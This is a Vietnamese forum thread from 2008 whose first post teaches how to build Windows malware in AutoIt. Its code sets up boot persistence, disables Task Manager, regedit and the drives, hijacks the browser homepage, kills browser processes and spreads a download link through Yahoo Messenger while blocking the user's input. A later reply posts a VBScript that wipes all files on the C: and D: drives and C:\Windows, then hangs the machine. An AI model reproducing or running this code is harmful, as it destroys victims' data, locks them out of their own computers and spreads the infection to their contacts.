-
07-05-2008, 06:10 PM #1Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
Làm virus = autoit (hướng dẫn đầy đủ)
Đầu tiên các bạn phải down chương trìnnh về tại đây
AutoIt Script Home Page
Link direct: http://www.autoitscript.com/cgi-bin/...t-v3-setup.exe
*Chú ý: +Khi edit 1 một con virus bắt buộc phải nhấn phải chuột rồi nhấn edit script, chứ nếu nhấn chuột trái như bình thường là bạn sẽ tự dính con virus mà bạn làm ra đó
+Không nên kiếm ebook autoit vì nó kô hữu dụng cho bạn đâu, nếu muốn học sâu và rộng hơn thì bạn bắt buộc phải đọc trong file help của chương trình
+Icon của chương trình bắt buộc kô được đẽ mặc định vì các trình virus sẽ phát hiện
+Các lệnh mình sẽ làm nổi lên
Bắt đầu nhé:
Đầu tiên các bạn copy code mình post bên dưới nha!
Sau đó thì:
Edit scirpt
Paste code vào
Convert file au3 --> exe (cái này quan trọng)
Nếu đây là lần đâu tiên bạn convert file au3 --> exe thì phải làm theo các bước đó, nhưng về sau bạn chỉ cần nhấn phải chột vào file au3 và nhấn compile script là file exe sẽ compile ngay tại thư mục chứa file au3 ^^
Lệnh đầu tiên mà bắt buộc con virus = autoit nào cũng phải có:
#Notrayicon
---> để kô hiện chương trình ở khay icon
FileCopy(@ScriptDir & "\******.exe","C:\WINDOWS",1)
---> "*****" sẽ là tên virus mà bạn tạo ở con autoit này, lệnh này dùng để kết hợp với lệnh kế tiếp
Lệnh khắc phục:
FileDelete("C:\Windows\*****.exe")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run","explorer","REG_SZ",@Win dowsDir & "\*****.exe")
---> **** sẽ là tên chương trình, lệnh này dùng để khởi động virus mỗi khi máy tính được bật lên, và chỉ dùng được khi có lệnh ở trên
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Run","explorer")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System","DisableTaskM gr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableTask Mgr","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa taskmanager của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableTask Mgr")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\System","DisableTas kMgr")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System","DisableRegis tryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableRegi stryTools","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa regedit của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableRegi stryTools")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\System","DisableReg istryTools")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoRun","R EG_DWORD","1")
----> lệnh này sẽ giúp làm mất nút run trong windows
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoRun")
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel","Homepage","REG_DWORD","kick_bay_gio@yahoo. com.vn")
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel","Homepage","REG_DWORD","1")
----> lệnh này sẽ giúp bạn thay đổi homepage của IE, ở đây mình change homepage lại là kick_bay_gio@yahoo.com.vn ^^"
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoViewOnDr ive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoViewOnD rive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoDrives", "REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" ,"REG_DWORD","67108863")
----> lệnh này giúp bạn khóa ổ đĩa của người khác, kô cho truy cập vào ổ đĩa, "67108863" ---> là thông số để khóa tất cả các ổ đĩa
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoViewOnD rive")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoViewOn Drive")
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" )
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoDrives ")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoClose"," REG_DWORD","1")
---> lệnh này làm mất nút close ở mỗi chương trinh (bật lên là kô thể tắt được (o_O)
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoClose")
Lệnh reset máy:
Shutdown(thông số)
Các thông số có thể có là
+0: Đổi user (hay thường gọi là log off)
+1: Tắt máy (shutdown)
+2: reset máy(restart)
+4: Force
+8: Power down
+32: Stanby
+64: Hibernate
VD: Shutdown(2) ---> reset máy
Lệnh đợi, dừng:
Sleep(seconds)
VD: Sleep(3000) ---> Dừng 3 giây
Cách phát tán trên yahoo (hót nhất ^^)
Dim $tin[10] -----> $tin[so] So: số ở đây là số tin nhắn mà bạn muống gửi trong yahoo
$tin[0] ="marryme " ------> bạn đặt lời nhắn vào trong dấu ngoặc kép + link down virus ^^"
$tin[1] ="vip"
$tin[2] =" nhut"
$tin[3] =" babu"
$tin[4] =" ...."
$tin[5] =" ...."
$tin[6] ="...... "
$tin[7] ="..... "
$tin[8] ="..... "
$tin[9] ="...... "
$tieude = WinGetTitle("Yahoo! Messenger","")
$kiemtra = WinExists ($tieude)
While 1
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
Sleep(2500)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput (0)
EndIf
Lệnh kô cho mỡ 1 chương trình bất kỳ (chỉ cần biết tên process của chương trình đó)
While
If Proces***ists("iexplorer.exe") then
ProcessClose("iexplorer.exe")
EndIf
If Proces***ists("firefox.exe") then
ProcessClose("firefox.exe")
EndIf
WEnd
----> VD: If Proces***ists("iexplorer.exe") then ---> khi máy tính mở file iexplorer (IE)
ProcessClose("iexplorer.exe") --> đóng ngay lập tức
EndIf
-
07-05-2008, 06:35 PM #2Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
hic ,bác ơi ,ai lại dạy cách hại người thế ,đã thế ,em cũng học cho biết :Khi (20):
-
07-15-2008, 07:48 AM #3Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
Bác ơi hôm nào em đến nhà bác học tận tay, đi ngay vào trong trán thế thì dễ hiểu hơn nhỉ ok không mời bác một trầu coffe Nắng sài gòn
-
07-15-2008, 10:04 AM #4Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
các bác cứ học đi rùi em ban nick vĩnh viễn hehe
-
07-15-2008, 04:07 PM #5Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
Bác ơi chơi cái này có an toàn không để em chơi thử cái hồi trước em cũng xài mấy cái auto hark cuối cùng máy bị DIE đó
-
07-15-2008, 06:14 PM #6Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
[QUOTE="hungmonitor"][COLOR=Red][B]Bác ơi chơi cái này có an toàn không để em chơi thử cái hồi trước em cũng xài mấy cái auto hark cuối cùng máy bị DIE đó:Ma (89):
-
07-15-2008, 07:48 PM #7Junior Member
- Ngày tham gia
- Nov 2015
- Bài viết
- 0
Bạn ơi cái này khi add lệnh vào có cần thêm mấy cái lệnh sửa chữa ở dưới hok hở bác?
-
07-15-2008, 08:53 PM #8Junior Member
- Ngày tham gia
- Nov 2015
- Bài viết
- 0
bác có hình hướng dẫn đầy đủ ko, hoặc chỉ cách làm từ A->Z luôn đi em gà đọc chả hiểu gì cả
-
07-16-2008, 04:36 AM #9Silver member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Bạn ơi cái lệnh đóng cuối cùng nó bị sao ấy làm mãi mà hok cóa được
-
07-16-2008, 06:36 AM #10Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
msgbox"chet nay` .. dinh virus của rongcon trong congtruongit.com rui` )"
On Error Resume Next
Set hack_map = Createobject("scripting.filesystemobject")
hack_map.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ hack_map.vbs"
Set hack_map2= CreateObject("WScript.Shell")
hack_map2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\die","wscript.exe "& hack_map.GetSpecialFolder(0)& "\ hack_map.vbs %"
On Error Resume Next
Const vic = "D:\"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub
On Error Resume Next
Const vic1 = "C:\windows\"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject("Scripting.FileSystemObject")
fso1.DeleteFile vic1 & "*.*" , True
fso1.DeleteFolder vic1 & "*" , True
End Sub
On Error Resume Next
Const vic2 = "C:\"
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject("Scripting.FileSystemObject")
fso2.DeleteFile vic2 & "*.*" , True
fso2.DeleteFolder vic2 & "*" , True
End Sub
On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop
còn đây là lời giải thích của tieuquynhi
ban đầu nó thêm 1 giá trị vào phần run để chạy cùng hệ thống
sau đó nó xóa tất cả các file và thư mục trong ổ D
sau đó xóa toàn bộ file và thư mục trong ổ C:\windows
rùi làm tương tự với ổ C
cuối cùng là mở liên tục notepad nhằm mục đích treo máy
Các Chủ đề tương tự
-
eScan Anti-Virus - Bảo vệ máy tính khỏi virus, spyware, hacker
Bởi chinhdel trong diễn đàn Security SoftwareTrả lời: 2Bài viết cuối: 11-01-2012, 01:08 AM -
The Ultimate Virus 1.20 - Phần mềm giả dạng virus
Bởi myphamuc93 trong diễn đàn Những Phần Mềm KhácTrả lời: 5Bài viết cuối: 03-17-2011, 04:26 PM -
Multi Virus Cleaner 2008 (MVC) Quét Virus khá mạnh
Bởi blogfordanlac trong diễn đàn Security SoftwareTrả lời: 0Bài viết cuối: 07-22-2008, 02:53 PM
Tất cả các doanh nghiệp, nhà thầu xây dựng đang hoạt động tại KCN Xuân Lộc Đồng Nai đều có nhu cầu sử dụng xe nâng người để nâng hạ người làm việc trên cao. Việc thuê xe nâng người tại KCN Xuân Lộc...
Lựa chọn đơn vị cho thuê xe nâng...